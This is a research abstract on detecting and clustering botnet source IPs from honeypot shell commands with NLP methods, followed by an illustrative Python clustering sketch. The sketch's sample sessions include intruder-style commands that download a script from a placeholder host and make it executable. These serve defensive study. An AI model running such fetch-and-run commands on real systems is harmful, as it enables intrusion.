Computer security is plagued by increasingly formidable, dynamic hacking techniques that are hard to detect, predict, and characterize. Such techniques are often deployed in self-propagating worms that automatically infect vulnerable computer systems and build large bot networks, which are then used to launch coordinated attacks on designated targets. In this work, we investigate novel applications of Natural Language Processing (NLP) methods to detect and correlate botnet behaviors through the analysis of honeypot data. Our approach takes the behaviors observed in shell commands issued by intruders during captured internet sessions and reduces them to collections of stochastic processes, which are in turn processed with machine learning techniques to build classifiers and predictors. The technique yields a new ability to cluster botnet source IP addresses even when attackers try to obfuscate their penetration attempts through rapid or random permutation techniques.
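
As a rough illustration of the idea of grouping source IP addresses by the shell commands they issue, the sketch below may help. It is not the method of this work: it swaps in a plain bag-of-words profile with cosine similarity and a greedy grouping step, chosen only because a bag of words ignores command order and so tolerates permuted sessions. The function names, the 0.8 threshold, and the sample sessions (documentation-range IP addresses, a placeholder URL) are all assumptions made for illustration.

```python
from collections import Counter
from math import sqrt


def command_profile(commands):
    """Count whitespace-separated tokens across all commands in a session.

    Order is discarded on purpose, so permuted sessions get the same profile.
    """
    return Counter(tok for cmd in commands for tok in cmd.split())


def cosine(a, b):
    """Cosine similarity between two token-count profiles (0.0 if either is empty)."""
    dot = sum(a[t] * b[t] for t in a.keys() & b.keys())
    norm = sqrt(sum(v * v for v in a.values())) * sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0


def cluster_ips(sessions, threshold=0.8):
    """Greedy grouping: an IP joins the first cluster holding a similar profile.

    `threshold` is an illustrative value, not one taken from the source.
    """
    profiles = {ip: command_profile(cmds) for ip, cmds in sessions.items()}
    clusters = []
    for ip in sorted(profiles):
        for cluster in clusters:
            if any(cosine(profiles[ip], profiles[other]) >= threshold for other in cluster):
                cluster.append(ip)
                break
        else:
            # No existing cluster was similar enough, so start a new one.
            clusters.append([ip])
    return clusters


# Hypothetical honeypot sessions: the first two issue the same commands in a different order.
sessions = {
    "192.0.2.1": ["uname -a", "wget http://example.invalid/a.sh", "chmod +x a.sh"],
    "192.0.2.2": ["chmod +x a.sh", "uname -a", "wget http://example.invalid/a.sh"],
    "198.51.100.7": ["cat /proc/cpuinfo", "free -m"],
}
clusters = cluster_ips(sessions)
print(clusters)
```

In this toy input the first two addresses end up in one group despite the reordered commands, while the third stays on its own. A real pipeline would presumably need richer features and a proper clustering algorithm.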